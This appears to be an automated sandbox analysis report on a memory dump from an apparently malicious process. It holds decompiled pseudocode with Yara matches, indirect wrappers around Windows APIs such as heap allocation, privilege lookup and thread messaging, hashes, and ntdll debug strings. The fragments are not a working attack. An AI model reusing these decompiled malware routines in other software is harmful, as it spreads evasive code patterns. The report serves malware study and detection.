Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 65ad7666882c8d6a65adca0cf8aa83097a1f605ddd692decfdb8639539b4f39e
Instruction ID: ca98572dbb5bca2050e8513b41c34cdd8552882dd027c8cad3b9dbdb67136c2c
Opcode Fuzzy Hash: 65ad7666882c8d6a65adca0cf8aa83097a1f605ddd692decfdb8639539b4f39e
Instruction Fuzzy Hash: F290026971300402D280715A540860A100597D1342F91D425A0006558DCD558869B361

Uniqueness

Uniqueness Score: -1.00%

Function 00F59710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F5971A

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 060e5310e39ab54be55905ba40a5f481b07da8e08f55c899d0e91078118bd49e
Instruction ID: 03d4135600f890d824602031901dd738e11053023965e03d5ec6fbe1cdc7b215
Opcode Fuzzy Hash: 060e5310e39ab54be55905ba40a5f481b07da8e08f55c899d0e91078118bd49e
Instruction Fuzzy Hash: EA90027170100802D200659A5408646100597E0341F51D021A5015555FCAA58891B171

Uniqueness

Uniqueness Score: -1.00%

Function 00409A90, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00409A90(char* __edx, intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* __ebx;
				void* __edi;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t51;
				intOrPtr* _t53;
				void* _t54;
				void* _t55;
				void* _t56;
				void* _t57;

				_t53 = _a4;
				_t39 = 0; // executed
				_t24 = E00407E80(__edx, _t53,  &_v24); // executed
				_t55 = _t54 + 8;
				if(_t24 != 0) {
					E00408090( &_v24,  &_v840);
					_t56 = _t55 + 8;
					do {
						E0041B810( &_v284, 0x104);
						E0041BE80( &_v284,  &_v804);
						_t57 = _t56 + 0x10;
						_t51 = 0x4f;
						while(1) {
							_t31 = E00414DC0(E00414D60(_t53, _t51),  &_v284);
							_t57 = _t57 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t51 = _t51 + 1;
							if(_t51 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t53 + 0x14; // 0xffffe045
						 *(_t53 + 0x474) =  *(_t53 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080C0(_t39, _t51,  &_v24,  &_v840);
						_t56 = _t57 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408140(_t53,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t53 + 0x55c)) =  *((intOrPtr*)(_t53 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t53 + 0x31)) =  *((intOrPtr*)(_t53 + 0x31)) + _t39;
					_t20 = _t53 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t53 + 0x32)) =  *((intOrPtr*)(_t53 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x00409a9b
0x00409aa3
0x00409aa5
0x00409aaa
0x00409aaf
0x00409ac2
0x00409ac7
0x00409ad0
0x00409adc
0x00409aef
0x00409af4
0x00409af7
0x00409b00
0x00409b12
0x00409b17
0x00409b1c
0x00000000
0x00000000
0x00409b1e
0x00409b22
0x00000000
0x00000000
0x00409b24
0x00000000
0x00409b22
0x00409b26
0x00409b29
0x00409b2f
0x00409b31
0x00409b3c
0x00409b41
0x00409b44
0x00409b51
0x00409b5c
0x00409b5e
0x00409b64
0x00409b68
0x00409b6b
0x00409b6b
0x00409b72
0x00409b75
0x00409b7a
0x00409b87
0x00409ab6
0x00409ab6
0x00409ab6

Memory Dump Source

Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0A2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31
memoryCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E0041A0A2(int _a4) {
				intOrPtr _v0;
				void* _t8;
				void* _t14;
				void* _t17;
				void* _t19;

				asm("loopne 0xffffffe8");
				 *((intOrPtr*)(_t8 + _t19)) =  *((intOrPtr*)(_t8 + _t19)) - _t14;
				_t17 = _t8;
				asm("ror dword [esp+esi+0x18211356], 0x55");
				_push(_t19);
				_t10 = _v0;
				_push(_t17);
				E0041A960(_v0, _v0 + 0xc7c,  *((intOrPtr*)(_t10 + 0xa14)), 0, 0x36);
				ExitProcess(_a4);
			}

0x0041a0a3
0x0041a0a5
0x0041a0a8
0x0041a0a9
0x0041a0b0
0x0041a0b3
0x0041a0bc
0x0041a0ca
0x0041a0d8

APIs

RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8

Strings

U, xrefs: 0041A0A9

Memory Dump Source

Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitFreeHeapProcess
String ID: U
API String ID: 1180424539-3372436214
Opcode ID: 69c9e96625086d12a6504776884877f21e01b1dda66d3eb02904c98b1c8efabf
Instruction ID: f516fc1fcd3aaa5750947fca47567c360c2f77f2479b008bf9fa3596c5fb4a11
Opcode Fuzzy Hash: 69c9e96625086d12a6504776884877f21e01b1dda66d3eb02904c98b1c8efabf
Instruction Fuzzy Hash: 74F0E2716092507BD720EF648C81EE77B6C9F49B10F1584AAF98C5F247C534A50587E2

Uniqueness

Uniqueness Score: -1.00%

Function 004082E8, Relevance: 1.6, APIs: 1, Instructions: 57
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E004082E8(void* __eax, signed int __ecx, long _a8) {
				char _v63;
				char _v64;
				void* _t15;
				int _t16;
				long _t24;
				int _t29;
				void* _t31;
				void* _t33;
				void* _t35;
				signed int _t41;

				_t35 = _t31;
				_pop(_t32);
				_t1 = __ecx + 0x55;
				 *_t1 =  *(__ecx + 0x55) << __ecx;
				_t41 =  *_t1;
				_t33 = _t35;
				_v64 = 0;
				E0041B860( &_v63, 0, 0x3f);
				E0041C400( &_v64, 3);
				_t15 = E0040ACD0(_t41, _a8 + 0x1c,  &_v64); // executed
				_t16 = E00414E20(_a8 + 0x1c, _t15, 0, 0, 0xc4e7b6d6);
				_t29 = _t16;
				if(_t29 != 0) {
					_t24 = _a8;
					_t16 = PostThreadMessageW(_t24, 0x111, 0, 0); // executed
					_t43 = _t16;
					if(_t16 == 0) {
						_t16 =  *_t29(_t24, 0x8003, _t33 + (E0040A460(_t43, 1, 8) & 0x000000ff) - 0x40, _t16);
					}
				}
				return _t16;
			}

0x004082ed
0x004082ed
0x004082ee
0x004082ee
0x004082ee
0x004082f1
0x004082ff
0x00408303
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: e09376dd73205d2ac7cb77f078a0ff4fe1b436498bfaf48c807d4cc3f3935afe
Instruction ID: 318cc6fd883a6ff4449ed8043f55c4f5bb401f3ca3d6de2f79d42fe58a89c95f
Opcode Fuzzy Hash: e09376dd73205d2ac7cb77f078a0ff4fe1b436498bfaf48c807d4cc3f3935afe
Instruction Fuzzy Hash: DC012831A803187BE720A6A59C43FFE372CAB40F44F14401DFF04BA1C1D6E9690647EA

Uniqueness

Uniqueness Score: -1.00%

Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041B860( &_v67, 0, 0x3f);
				E0041C400( &_v68, 3);
				_t12 = E0040ACD0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A460(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x004082f0
0x004082ff
0x00408303
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x00000000
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A960(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a07f
0x0041a087
0x0041a09d
0x0041a0a1

APIs

RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D

Memory Dump Source

Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A030, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A030(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				E0041A960(_a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a047
0x0041a05d
0x0041a061

APIs

RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D

Memory Dump Source

Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1D0, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A1D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E0041A960(_a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a1ea
0x0041a200
0x0041a204

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200

Memory Dump Source

Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0B0, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A0B0(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E0041A960(_a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x0041a0b3
0x0041a0ca
0x0041a0d8

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8

Memory Dump Source

Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1

Uniqueness

Uniqueness Score: -1.00%

Function 00F5967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F59694

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1527c710c1e0e2c83c67bf8fb86e93aa41cb4e5c46ac5ee222a6d8163aee5256
Instruction ID: ba833e51994be8ccf52532ac0b01eb9847a0628f2f7d48cea821d77d8d67efdd
Opcode Fuzzy Hash: 1527c710c1e0e2c83c67bf8fb86e93aa41cb4e5c46ac5ee222a6d8163aee5256
Instruction Fuzzy Hash: 50B09B71D054C5C5D715D7614608717794077D0751F17C061D2020641B4778C495F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00FCB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00FCB53F
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00FCB47D
*** Resource timeout (%p) in %ws:%s, xrefs: 00FCB352
*** then kb to get the faulting stack, xrefs: 00FCB51C
*** A stack buffer overrun occurred in %ws:%s, xrefs: 00FCB2F3
a NULL pointer, xrefs: 00FCB4E0
*** enter .exr %p for the exception record, xrefs: 00FCB4F1
This failed because of error %Ix., xrefs: 00FCB446
*** Inpage error in %ws:%s, xrefs: 00FCB418
*** enter .cxr %p for the context, xrefs: 00FCB50D
*** An Access Violation occurred in %ws:%s, xrefs: 00FCB48F
Go determine why that thread has not released the critical section., xrefs: 00FCB3C5
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00FCB38F
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00FCB314
The instruction at %p referenced memory at %p., xrefs: 00FCB432
The resource is owned shared by %d threads, xrefs: 00FCB37E
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00FCB476
The instruction at %p tried to %s , xrefs: 00FCB4B6
<unknown>, xrefs: 00FCB27E, 00FCB2D1, 00FCB350, 00FCB399, 00FCB417, 00FCB48E
an invalid address, %p, xrefs: 00FCB4CF
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00FCB2DC
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00FCB484
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 00FCB39B
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00FCB305
The critical section is owned by thread %p., xrefs: 00FCB3B9
The resource is owned exclusively by thread %p, xrefs: 00FCB374
read from, xrefs: 00FCB4AD, 00FCB4B2
write to, xrefs: 00FCB4A6
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00FCB323
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00FCB3D6

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 245a32bc8c4489b0ceeab4d39d1b662c525f860205e0e4c31fad508f118723ec
Instruction ID: cfc5e7bd4d3cb1cd31946c2027cb3302bd7362aeb012681d1528204bf7372d1c
Opcode Fuzzy Hash: 245a32bc8c4489b0ceeab4d39d1b662c525f860205e0e4c31fad508f118723ec
Instruction Fuzzy Hash: EE81E1B9A40211FFDB29AE458D47F7F3B26AF46B61F454048F4042B193E365C851FAB2

Uniqueness

Uniqueness Score: -1.00%

Function 00FD1C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00FD1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0xef48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00F1B150();
				} else {
					E00F1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x100589c);
				E00F1B150("Heap error detected at %p (heap handle %p)\n",  *0x10058a0);
				_t27 =  *0x1005898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M00FD1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00F1B150();
				} else {
					E00F1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E00F1B150("Error code: %d - %s\n",  *0x1005898);
				_t113 =  *0x10058a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00F1B150();
					} else {
						E00F1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00F1B150("Parameter1: %p\n",  *0x10058a4);
				}
				_t115 =  *0x10058a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00F1B150();
					} else {
						E00F1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00F1B150("Parameter2: %p\n",  *0x10058a8);
				}
				_t117 =  *0x10058ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00F1B150();
					} else {
						E00F1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00F1B150("Parameter3: %p\n",  *0x10058ac);
				}
				_t119 =  *0x10058b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00F1B150();
					} else {
						E00F1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x10058b4);
					E00F1B150("Last known valid blocks: before - %p, after - %p\n",  *0x10058b0);
				} else {
					_t120 =  *0x10058b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00F1B150();
				} else {
					E00F1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E00F1B150("Stack trace available at %p\n", 0x10058c0);
			}

0x00fd1c10
0x00fd1c16
0x00fd1c1e
0x00fd1c3d
0x00fd1c3e
0x00fd1c20
0x00fd1c35
0x00fd1c3a
0x00fd1c44
0x00fd1c55
0x00fd1c5a
0x00fd1c65
0x00fd1c67
0x00000000
0x00fd1c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00fd1c67
0x00fd1cdc
0x00fd1ce5
0x00fd1d04
0x00fd1d05
0x00fd1ce7
0x00fd1cfc
0x00fd1d01
0x00fd1d0b
0x00fd1d17
0x00fd1d1f
0x00fd1d25
0x00fd1d30
0x00fd1d4f
0x00fd1d50
0x00fd1d32
0x00fd1d47
0x00fd1d4c
0x00fd1d61
0x00fd1d67
0x00fd1d68
0x00fd1d6e
0x00fd1d79
0x00fd1d98
0x00fd1d99
0x00fd1d7b
0x00fd1d90
0x00fd1d95
0x00fd1daa
0x00fd1db0
0x00fd1db1
0x00fd1db7
0x00fd1dc2
0x00fd1de1
0x00fd1de2
0x00fd1dc4
0x00fd1dd9
0x00fd1dde
0x00fd1df3
0x00fd1df9
0x00fd1dfa
0x00fd1e00
0x00fd1e0a
0x00fd1e13
0x00fd1e32
0x00fd1e33
0x00fd1e15
0x00fd1e2a
0x00fd1e2f
0x00fd1e39
0x00fd1e4a
0x00fd1e02
0x00fd1e02
0x00fd1e08
0x00000000
0x00000000
0x00fd1e08
0x00fd1e5b
0x00fd1e7a
0x00fd1e7b
0x00fd1e5d
0x00fd1e72
0x00fd1e77
0x00fd1e95

Strings

Stack trace available at %p, xrefs: 00FD1E86
heap_failure_generic, xrefs: 00FD1C7C
heap_failure_block_not_busy, xrefs: 00FD1CA6
heap_failure_buffer_overrun, xrefs: 00FD1C98
Parameter3: %p, xrefs: 00FD1DEE
heap_failure_usage_after_free, xrefs: 00FD1CBB
heap_failure_listentry_corruption, xrefs: 00FD1CD0
Parameter2: %p, xrefs: 00FD1DA5
heap_failure_unknown, xrefs: 00FD1C75
heap_failure_invalid_allocation_type, xrefs: 00FD1CB4
Last known valid blocks: before - %p, after - %p, xrefs: 00FD1E45
heap_failure_invalid_argument, xrefs: 00FD1CAD
heap_failure_lfh_bitmap_mismatch, xrefs: 00FD1CD7
HEAP[%wZ]: , xrefs: 00FD1C30, 00FD1CF7, 00FD1D42, 00FD1D8B, 00FD1DD4, 00FD1E25, 00FD1E6D
Heap error detected at %p (heap handle %p), xrefs: 00FD1C50
HEAP: , xrefs: 00FD1C16, 00FD1C3D, 00FD1D04, 00FD1D4F, 00FD1D98, 00FD1DE1, 00FD1E32, 00FD1E7A
Error code: %d - %s, xrefs: 00FD1D12
heap_failure_virtual_block_corruption, xrefs: 00FD1C91
heap_failure_multiple_entries_corruption, xrefs: 00FD1C8A
heap_failure_buffer_underrun, xrefs: 00FD1C9F
heap_failure_freelists_corruption, xrefs: 00FD1CC9
heap_failure_cross_heap_operation, xrefs: 00FD1CC2
Parameter1: %p, xrefs: 00FD1D5C
heap_failure_entry_corruption, xrefs: 00FD1C83
heap_failure_internal, xrefs: 00FD1C6E

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 0ea75f4086b2fe9dbf43766bbdf153364322b76b14daa17c7d47bff9d0a819dc
Instruction ID: 9fdbeec20b39a7441a1f9fd753a38adca8aa3e00551d3ffae41411836a61df4a
Opcode Fuzzy Hash: 0ea75f4086b2fe9dbf43766bbdf153364322b76b14daa17c7d47bff9d0a819dc
Instruction Fuzzy Hash: C0619337A65148FFD3119744E855A7173A6F704B30B1D846BF8097B392C7299C80BF0A

Uniqueness

Uniqueness Score: -1.00%

Function 00416CA2, Relevance: 7.6, Strings: 6, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00416CA2(void* __eax, signed int __ecx, signed int* __edx, void* _a12, void* _a16) {
				void* _v4;
				void* _v8;
				void* _v10;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v28;
				void* _v32;
				void* _v36;

				asm("pushfd");
				_push(__ecx);
				asm("cmpsb");
				if((__ecx &  *__edx) == 0) {
					return __eax;
				}
			}

0x00416ca2
0x00416ca3
0x00416ca6
0x00416ca7
0x00416cb3
0x00416cb3

Strings

Host, xrefs: 00416D42
: , xrefs: 00416D49
